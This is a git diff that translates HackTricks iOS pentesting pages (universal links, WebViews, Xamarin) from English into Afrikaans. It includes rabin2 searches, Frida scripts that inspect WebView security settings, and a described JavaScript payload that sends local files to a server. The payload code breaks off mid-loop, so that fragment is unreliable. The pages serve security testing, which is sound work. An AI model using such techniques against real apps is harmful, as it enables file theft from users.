incomingURL, resolvingAgainstBaseURL: true), - let path = components.path, - let params = components.queryItems else { - return false - } +continue userActivity: NSUserActivity, +restorationHandler: @escaping ([Any]?) -> Void) -> Bool { +guard userActivity.activityType == NSUserActivityTypeBrowsingWeb, +let incomingURL = userActivity.webpageURL, +let components = NSURLComponents(url: incomingURL, resolvingAgainstBaseURL: true), +let path = components.path, +let params = components.queryItems else { +return false +} - if let albumName = params.first(where: { $0.name == "albumname" })?.value, - let photoIndex = params.first(where: { $0.name == "index" })?.value { - // Process the URL with album name and photo index +if let albumName = params.first(where: { $0.name == "albumname" })?.value, +let photoIndex = params.first(where: { $0.name == "index" })?.value { +// Process the URL with album name and photo index - return true +return true - } else { - // Handle invalid or missing parameters +} else { +// Handle invalid or missing parameters - return false - } +return false +} } ``` - -Through **diligent configuration and validation**, developers can ensure that universal links enhance user experience while maintaining security and privacy standards. +Deur **noukeurige konfigurasie en validering**, kan ontwikkelaars verseker dat universele skakels die gebruikerservaring verbeter terwyl sekuriteits- en privaatheidsstandaarde gehandhaaf word. -## References +## Verwysings * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis) * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8) @@ -103,16 +97,14 @@ Through **diligent configuration and validation**, developers can ensure that un
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-webviews.md b/mobile-pentesting/ios-pentesting/ios-webviews.md index c2d47a562..e288feea8 100644 --- a/mobile-pentesting/ios-pentesting/ios-webviews.md +++ b/mobile-pentesting/ios-pentesting/ios-webviews.md @@ -2,31 +2,30 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-The code of this page was extracted from [here](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Check the page for further details. +Die kode van hierdie bladsy is onttrek van [hier](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Kyk na die bladsy vir verdere besonderhede. -## WebViews types +## WebViews-tipes -WebViews are utilized within applications to display web content interactively. Various types of WebViews offer different functionalities and security features for iOS applications. Here's a brief overview: +WebViews word binne programme gebruik om webinhoud interaktief weer te gee. Verskillende tipes WebViews bied verskillende funksionaliteite en sekuriteitskenmerke vir iOS-programme. Hier is 'n kort oorsig: -- **UIWebView**, which is no longer recommended from iOS 12 onwards due to its lack of support for disabling **JavaScript**, making it susceptible to script injection and **Cross-Site Scripting (XSS)** attacks. +- **UIWebView**, wat vanaf iOS 12 nie meer aanbeveel word nie as gevolg van sy gebrek aan ondersteuning vir die uitskakeling van **JavaScript**, wat dit vatbaar maak vir skripsinjeksie en **Cross-Site Scripting (XSS)**-aanvalle. -- **WKWebView** is the preferred option for incorporating web content into apps, offering enhanced control over the content and security features. **JavaScript** is enabled by default, but it can be disabled if necessary. It also supports features to prevent JavaScript from automatically opening windows and ensures that all content is loaded securely. Additionally, **WKWebView**'s architecture minimizes the risk of memory corruption affecting the main app process. - -- **SFSafariViewController** offers a standardized web browsing experience within apps, recognizable by its specific layout including a read-only address field, share and navigation buttons, and a direct link to open content in Safari. Unlike **WKWebView**, **JavaScript** cannot be disabled in **SFSafariViewController**, which also shares cookies and data with Safari, maintaining user privacy from the app. It must be displayed prominently according to App Store guidelines. +- **WKWebView** is die voorkeur-opsie vir die inkorporering van webinhoud in programme, en bied verbeterde beheer oor die inhoud en sekuriteitskenmerke. **JavaScript** is standaard geaktiveer, maar dit kan uitgeskakel word indien nodig. Dit ondersteun ook funksies om te voorkom dat JavaScript outomaties vensters oopmaak en verseker dat alle inhoud veilig gelaai word. Daarbenewens minimaliseer die argitektuur van **WKWebView** die risiko van geheuekorruptie wat die hoofprogramproses kan affekteer. +- **SFSafariViewController** bied 'n gestandaardiseerde webblaaier-ervaring binne programme, wat herkenbaar is aan sy spesifieke uitleg, insluitend 'n lees-slegs-adresveld, deel- en navigasieknoppies, en 'n direkte skakel om inhoud in Safari oop te maak. Anders as **WKWebView** kan **JavaScript** nie uitgeskakel word in **SFSafariViewController** nie, wat ook koekies en data deel met Safari en sodoende die gebruiker se privaatheid van die app handhaaf. Dit moet volgens die App Store-riglyne duidelik vertoon word. ```javascript // Example of disabling JavaScript in WKWebView: WKPreferences *preferences = [[WKPreferences alloc] init]; @@ -35,272 +34,243 @@ WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init]; config.preferences = preferences; WKWebView *webView = [[WKWebView alloc] initWithFrame:CGRectZero configuration:config]; ``` +## Opsomming van WebViews-konfigurasie-ondersoek -## WebViews Configuration Exploration Summary +### **Oorsig van Statische Analise** -### **Static Analysis Overview** - -In the process of examining **WebViews** configurations, two primary types are focused on: **UIWebView** and **WKWebView**. For identifying these WebViews within a binary, commands are utilized, searching for specific class references and initialization methods. - -- **UIWebView Identification** +In die proses van die ondersoek van WebViews-konfigurasies, word daar gefokus op twee primêre tipes: **UIWebView** en **WKWebView**. Om hierdie WebViews binne 'n binêre lêer te identifiseer, word bevele gebruik om spesifieke klasverwysings en inisialisasiemetodes te soek. +- **UIWebView-identifikasie** ```bash $ rabin2 -zz ./WheresMyBrowser | egrep "UIWebView$" ``` +Hierdie bevel help om instansies van **UIWebView** op te spoor deur te soek na teksstrings wat daarmee verband hou in die binêre lêer. -This command helps in locating instances of **UIWebView** by searching for text strings related to it in the binary. - -- **WKWebView Identification** - +- **WKWebView Identifikasie** ```bash $ rabin2 -zz ./WheresMyBrowser | egrep "WKWebView$" ``` +Op soortgelyke wyse soek hierdie bevel die binêre lêer vir teksreekse wat dui op die gebruik van **WKWebView**. -Similarly, for **WKWebView**, this command searches the binary for text strings indicative of its usage. - -Furthermore, to find how a **WKWebView** is initialized, the following command is executed, targeting the method signature related to its initialization: - +Verder, om uit te vind hoe 'n **WKWebView** geïnisialiseer word, word die volgende bevel uitgevoer, wat die metodesignatuur teiken wat verband hou met sy inisialisering: ```bash $ rabin2 -zzq ./WheresMyBrowser | egrep "WKWebView.*frame" ``` +#### **JavaScript-konfigurasieverifikasie** -#### **JavaScript Configuration Verification** - -For **WKWebView**, it's highlighted that disabling JavaScript is a best practice unless required. The compiled binary is searched to confirm that the `javaScriptEnabled` property is set to `false`, ensuring that JavaScript is disabled: - +Vir **WKWebView** word daar beklemtoon dat dit 'n goeie praktyk is om JavaScript te deaktiveer tensy dit nodig is. Die saamgestelde binêre lêer word deursoek om te bevestig dat die `javaScriptEnabled` eienskap op `false` ingestel is, om te verseker dat JavaScript gedeaktiveer is: ```bash $ rabin2 -zz ./WheresMyBrowser | grep -i "javascriptenabled" ``` +#### **Slegs Sekure Inhoud Verifikasie** -#### **Only Secure Content Verification** - -**WKWebView** offers the capability to identify mixed content issues, contrasting with **UIWebView**. This is checked using the `hasOnlySecureContent` property to ensure all page resources are loaded through secure connections. The search in the compiled binary is performed as follows: - +**WKWebView** bied die vermoë om gemengde inhoudsprobleme te identifiseer, in teenstelling met **UIWebView**. Dit word nagegaan deur die gebruik van die `hasOnlySecureContent` eienskap om te verseker dat alle bladsybronne deur veilige verbindinge gelaai word. Die soektog in die saamgestelde binêre kode word as volg uitgevoer: ```bash $ rabin2 -zz ./WheresMyBrowser | grep -i "hasonlysecurecontent" ``` +### **Dinamiese Analise-insigte** -### **Dynamic Analysis Insights** +Dinamiese analise behels die inspeksie van die heap vir WebView-instanties en hul eienskappe. 'n Skrip met die naam `webviews_inspector.js` word gebruik vir hierdie doel, wat `UIWebView`, `WKWebView`, en `SFSafariViewController`-instanties teiken. Dit registreer inligting oor gevonde instanties, insluitend URL's en instellings wat verband hou met JavaScript en veilige inhoud. -Dynamic analysis involves inspecting the heap for WebView instances and their properties. A script named `webviews_inspector.js` is used for this purpose, targeting `UIWebView`, `WKWebView`, and `SFSafariViewController` instances. It logs information about found instances, including URLs and settings related to JavaScript and secure content. - -Heap inspection can be conducted using `ObjC.choose()` to identify WebView instances and check `javaScriptEnabled` and `hasonlysecurecontent` properties. +Heap-inspeksie kan uitgevoer word deur `ObjC.choose()` te gebruik om WebView-instanties te identifiseer en die `javaScriptEnabled` en `hasonlysecurecontent`-eienskappe te kontroleer. {% code title="webviews_inspector.js" %} ```javascript ObjC.choose(ObjC.classes['UIWebView'], { - onMatch: function (ui) { - console.log('onMatch: ', ui); - console.log('URL: ', ui.request().toString()); - }, - onComplete: function () { - console.log('done for UIWebView!'); - } +onMatch: function (ui) { +console.log('onMatch: ', ui); +console.log('URL: ', ui.request().toString()); +}, +onComplete: function () { +console.log('done for UIWebView!'); +} }); ObjC.choose(ObjC.classes['WKWebView'], { - onMatch: function (wk) { - console.log('onMatch: ', wk); - console.log('URL: ', wk.URL().toString()); - }, - onComplete: function () { - console.log('done for WKWebView!'); - } +onMatch: function (wk) { +console.log('onMatch: ', wk); +console.log('URL: ', wk.URL().toString()); +}, +onComplete: function () { +console.log('done for WKWebView!'); +} }); ObjC.choose(ObjC.classes['SFSafariViewController'], { - onMatch: function (sf) { - console.log('onMatch: ', sf); - }, - onComplete: function () { - console.log('done for SFSafariViewController!'); - } +onMatch: function (sf) { +console.log('onMatch: ', sf); +}, +onComplete: function () { +console.log('done for SFSafariViewController!'); +} }); ObjC.choose(ObjC.classes['WKWebView'], { - onMatch: function (wk) { - console.log('onMatch: ', wk); - console.log('javaScriptEnabled:', wk.configuration().preferences().javaScriptEnabled()); - } +onMatch: function (wk) { +console.log('onMatch: ', wk); +console.log('javaScriptEnabled:', wk.configuration().preferences().javaScriptEnabled()); +} }); ObjC.choose(ObjC.classes['WKWebView'], { - onMatch: function (wk) { - console.log('onMatch: ', wk); - console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); - } +onMatch: function (wk) { +console.log('onMatch: ', wk); +console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); +} }); ``` {% endcode %} -The script is executed with: - +Die skrip word uitgevoer met: ```bash frida -U com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js ``` +**Belangrike uitkomste**: +- Gevalle van WebViews word suksesvol opgespoor en ondersoek. +- JavaScript-aktivering en veilige inhoudsinstellings word geverifieer. -**Key Outcomes**: -- Instances of WebViews are successfully located and inspected. -- JavaScript enablement and secure content settings are verified. +Hierdie opsomming omvat die kritieke stappe en opdragte wat betrokke is by die analise van WebView-konfigurasies deur statiese en dinamiese benaderings, met die klem op sekuriteitskenmerke soos JavaScript-aktivering en gemengde inhoudsdeteksie. -This summary encapsulates the critical steps and commands involved in analyzing WebView configurations through static and dynamic approaches, focusing on security features like JavaScript enablement and mixed content detection. +## WebView-protokolhantering -## WebView Protocol Handling +Die hantering van inhoud in WebViews is 'n kritieke aspek, veral wanneer dit kom by verskillende protokolle soos `http(s)://`, `file://`, en `tel://`. Hierdie protokolle maak dit moontlik om beide afgeleë en plaaslike inhoud binne programme te laai. Dit word beklemtoon dat wanneer plaaslike inhoud gelaai word, voorbehoudsmaatreëls getref moet word om te voorkom dat gebruikers die lêernaam of -pad beïnvloed en die inhoud self wysig. -Handling content in WebViews is a critical aspect, especially when dealing with various protocols such as `http(s)://`, `file://`, and `tel://`. These protocols enable the loading of both remote and local content within apps. It is emphasized that when loading local content, precautions must be taken to prevent users from influencing the file's name or path and from editing the content itself. - -**WebViews** offer different methods for content loading. For **UIWebView**, now deprecated, methods like `loadHTMLString:baseURL:` and `loadData:MIMEType:textEncodingName:baseURL:` are used. **WKWebView**, on the other hand, employs `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, and `loadRequest:` for web content. Methods such as `pathForResource:ofType:`, `URLForResource:withExtension:`, and `init(contentsOf:encoding:)` are typically utilized for loading local files. The method `loadFileURL:allowingReadAccessToURL:` is particularly notable for its ability to load a specific URL or directory into the WebView, potentially exposing sensitive data if a directory is specified. - -To find these methods in the source code or compiled binary, commands like the following can be used: +**WebViews** bied verskillende metodes vir inhoudsoplaai. Vir **UIWebView**, wat nou verouderd is, word metodes soos `loadHTMLString:baseURL:` en `loadData:MIMEType:textEncodingName:baseURL:` gebruik. **WKWebView** maak daarenteen gebruik van `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, en `loadRequest:` vir webinhoud. Metodes soos `pathForResource:ofType:`, `URLForResource:withExtension:`, en `init(contentsOf:encoding:)` word tipies gebruik vir die laai van plaaslike lêers. Die metode `loadFileURL:allowingReadAccessToURL:` is veral merkwaardig vir sy vermoë om 'n spesifieke URL of gids in die WebView te laai, wat moontlik sensitiewe data kan blootstel as 'n gids gespesifiseer word. +Om hierdie metodes in die bronkode of saamgestelde binêre lêer te vind, kan opdragte soos die volgende gebruik word: ```bash $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString" 231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL: ``` +Met betrekking tot **lêertoegang** maak UIWebView dit universeel moontlik, terwyl WKWebView `allowFileAccessFromFileURLs` en `allowUniversalAccessFromFileURLs` instellings introduceer om toegang vanaf lêer-URL's te bestuur, waar beide standaard vals is. -Regarding **file access**, UIWebView allows it universally, whereas WKWebView introduces `allowFileAccessFromFileURLs` and `allowUniversalAccessFromFileURLs` settings for managing access from file URLs, with both being false by default. - -A Frida script example is provided to inspect **WKWebView** configurations for security settings: - +'n Voorbeeld van 'n Frida-skripsie word verskaf om **WKWebView**-konfigurasies vir sekuriteitsinstellings te ondersoek: ```bash ObjC.choose(ObjC.classes['WKWebView'], { - onMatch: function (wk) { - console.log('onMatch: ', wk); - console.log('URL: ', wk.URL().toString()); - console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled()); - console.log('allowFileAccessFromFileURLs: ', - wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString()); - console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); - console.log('allowUniversalAccessFromFileURLs: ', - wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString()); - }, - onComplete: function () { - console.log('done for WKWebView!'); - } +onMatch: function (wk) { +console.log('onMatch: ', wk); +console.log('URL: ', wk.URL().toString()); +console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled()); +console.log('allowFileAccessFromFileURLs: ', +wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString()); +console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); +console.log('allowUniversalAccessFromFileURLs: ', +wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString()); +}, +onComplete: function () { +console.log('done for WKWebView!'); +} }); ``` - -Lastly, an example of a JavaScript payload aimed at exfiltrating local files demonstrates the potential security risk associated with improperly configured WebViews. This payload encodes file contents into hex format before transmitting them to a server, highlighting the importance of stringent security measures in WebView implementations. - +Laastens, 'n voorbeeld van 'n JavaScript-vraglas wat gemik is op die uitlek van plaaslike lêers, demonstreer die potensiële veiligheidsrisiko wat verband hou met verkeerd gekonfigureerde WebViews. Hierdie vraglas kodeer lêerinhoude na heksformaat voordat dit na 'n bediener gestuur word, wat die belangrikheid van streng veiligheidsmaatreëls in WebView-implementasies beklemtoon. ```javascript String.prototype.hexEncode = function(){ - var hex, i; - var result = ""; - for (i=0; i - + ``` - -The native side handles the JavaScript call as shown in the `JavaScriptBridgeMessageHandler` class, where the result of operations like multiplying numbers is processed and sent back to JavaScript for display or further manipulation: - +Die inheemse kant hanteer die JavaScript-oproep soos getoon in die `JavaScriptBridgeMessageHandler`-klas, waar die resultaat van operasies soos die vermenigvuldiging van getalle verwerk en terug na JavaScript gestuur word vir vertoning of verdere manipulasie: ```swift class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler { - // Handling "multiplyNumbers" operation - case "multiplyNumbers": - let arg1 = Double(messageArray[1])! - let arg2 = Double(messageArray[2])! - result = String(arg1 * arg2) - // Callback to JavaScript - let javaScriptCallBack = "javascriptBridgeCallBack('\(functionFromJS)','\(result)')" - message.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil) +// Handling "multiplyNumbers" operation +case "multiplyNumbers": +let arg1 = Double(messageArray[1])! +let arg2 = Double(messageArray[2])! +result = String(arg1 * arg2) +// Callback to JavaScript +let javaScriptCallBack = "javascriptBridgeCallBack('\(functionFromJS)','\(result)')" +message.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil) } ``` - ## Debugging iOS WebViews -(Tutorial based on the one from [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews)) +(Tutoriaal gebaseer op dié van [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews)) -To effectively debug web content within iOS webviews, a specific setup involving Safari's developer tools is required due to the fact that messages sent to `console.log()` are not displayed in Xcode logs. Here's a simplified guide, emphasizing key steps and requirements: +Om webinhoud binne iOS-webweergawes effektief te ontleed, is 'n spesifieke opset nodig wat betrekking het op Safari se ontwikkelertools, aangesien boodskappe wat na `console.log()` gestuur word nie in Xcode-logboeke vertoon word nie. Hier is 'n vereenvoudigde gids wat die sleutelstappe en vereistes beklemtoon: -- **Preparation on iOS Device**: The Safari Web Inspector needs to be activated on your iOS device. This is done by going to **Settings > Safari > Advanced**, and enabling the _Web Inspector_. +- **Voorbereiding op iOS-toestel**: Die Safari Web Inspector moet geaktiveer word op jou iOS-toestel. Dit word gedoen deur na **Instellings > Safari > Gevorderd** te gaan en die _Web Inspector_ te aktiveer. -- **Preparation on macOS Device**: On your macOS development machine, you must enable developer tools within Safari. Launch Safari, access **Safari > Preferences > Advanced**, and select the option to _Show Develop menu_. +- **Voorbereiding op macOS-toestel**: Op jou macOS-ontwikkelingsrekenaar moet jy ontwikkelertools in Safari aktiveer. Begin Safari, gaan na **Safari > Voorkeure > Gevorderd** en kies die opsie om die _Ontwikkel-menu te wys_. -- **Connection and Debugging**: After connecting your iOS device to your macOS computer and launching your application, use Safari on your macOS device to select the webview you want to debug. Navigate to _Develop_ in Safari's menu bar, hover over your iOS device's name to see a list of webview instances, and select the instance you wish to inspect. A new Safari Web Inspector window will open for this purpose. +- **Verbinding en ontleedwerk**: Nadat jy jou iOS-toestel aan jou macOS-rekenaar gekoppel het en jou toepassing begin het, gebruik Safari op jou macOS-toestel om die webweergawe wat jy wil ontleed, te kies. Navigeer na _Ontwikkel_ in Safari se menubalk, hou oor jou iOS-toestel se naam om 'n lys van webweergawe-eksemplare te sien, en kies die eksemplaar wat jy wil ondersoek. 'n Nuwe Safari Web Inspector-venster sal vir hierdie doel oopmaak. -However, be mindful of the limitations: +Wees egter bewus van die beperkings: -- Debugging with this method requires a macOS device since it relies on Safari. -- Only webviews in applications loaded onto your device through Xcode are eligible for debugging. Webviews in apps installed via the App Store or Apple Configurator cannot be debugged in this manner. +- Ontleedwerk met hierdie metode vereis 'n macOS-toestel aangesien dit afhanklik is van Safari. +- Slegs webweergawes in toepassings wat deur Xcode op jou toestel gelaai is, is geskik vir ontleedwerk. Webweergawes in programme wat via die App Store of Apple Configurator geïnstalleer is, kan nie op hierdie manier ontleed word nie. -## References +## Verwysings * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6) * [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS) @@ -308,14 +278,14 @@ However, be mindful of the limitations:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/mobile-pentesting/xamarin-apps.md b/mobile-pentesting/xamarin-apps.md index 8edda1c77..d505168f4 100644 --- a/mobile-pentesting/xamarin-apps.md +++ b/mobile-pentesting/xamarin-apps.md @@ -2,85 +2,81 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-This is a summary of the blog post [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers) +Hierdie is 'n opsomming van die blogpos [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers) -## **Basic Information** +## **Basiese Inligting** -Xamarin is an **open-source platform** designed for developers to **build apps for iOS, Android, and Windows** using the .NET and C# frameworks. This platform offers access to numerous tools and extensions to create modern applications efficiently. +Xamarin is 'n **open-source platform** wat ontwikkel is vir ontwikkelaars om programme vir iOS, Android en Windows te bou met behulp van die .NET en C# raamwerke. Hierdie platform bied toegang tot verskeie gereedskap en uitbreidings om moderne toepassings doeltreffend te skep. -### Xamarin's Architecture +### Xamarin se Argitektuur -- For **Android**, Xamarin integrates with Android and Java namespaces through .NET bindings, operating within the Mono execution environment alongside the Android Runtime (ART). Managed Callable Wrappers (MCW) and Android Callable Wrappers (ACW) facilitate communication between Mono and ART, both of which are built on the Linux kernel. -- For **iOS**, applications run under the Mono runtime, utilizing full Ahead of Time (AOT) compilation to convert C# .NET code into ARM assembly language. This process runs alongside the Objective-C Runtime on a UNIX-like kernel. +- Vir **Android** integreer Xamarin met Android- en Java-naamruimtes deur .NET-bindings, wat binne die Mono-uitvoeringsomgewing saam met die Android Runtime (ART) werk. Managed Callable Wrappers (MCW) en Android Callable Wrappers (ACW) fasiliteer kommunikasie tussen Mono en ART, wat albei op die Linux-kernel gebaseer is. +- Vir **iOS** loop programme onder die Mono-runtime en maak volledige Ahead of Time (AOT) samestelling gebruik om C# .NET-kode na ARM-assambleertaal om te skakel. Hierdie proses loop saam met die Objective-C Runtime op 'n UNIX-soortgelyke kernel. -### .NET Runtime and Mono Framework +### .NET Runtime en Mono Raamwerk -The **.NET framework** includes assemblies, classes, and namespaces for application development, with the .NET Runtime managing code execution. It offers platform independence and backward compatibility. The **Mono Framework** is an open-source version of the .NET framework, initiated in 2005 to extend .NET to Linux, now supported by Microsoft and led by Xamarin. +Die **.NET-raamwerk** sluit samestellings, klasse en naamruimtes vir toepassingsontwikkeling in, met die .NET Runtime wat kode-uitvoering bestuur. Dit bied platform-onafhanklikheid en agterwaartse versoenbaarheid. Die **Mono-raamwerk** is 'n open-source weergawe van die .NET-raamwerk, wat in 2005 begin is om .NET na Linux uit te brei, en word nou ondersteun deur Microsoft en gelei deur Xamarin. -### Reverse Engineering Xamarin Apps +### Reverse Engineering van Xamarin Apps -#### Decompilation of Xamarin Assemblies +#### Decompilering van Xamarin-samestellings -Decompilation transforms compiled code back into source code. In Windows, the Modules window in 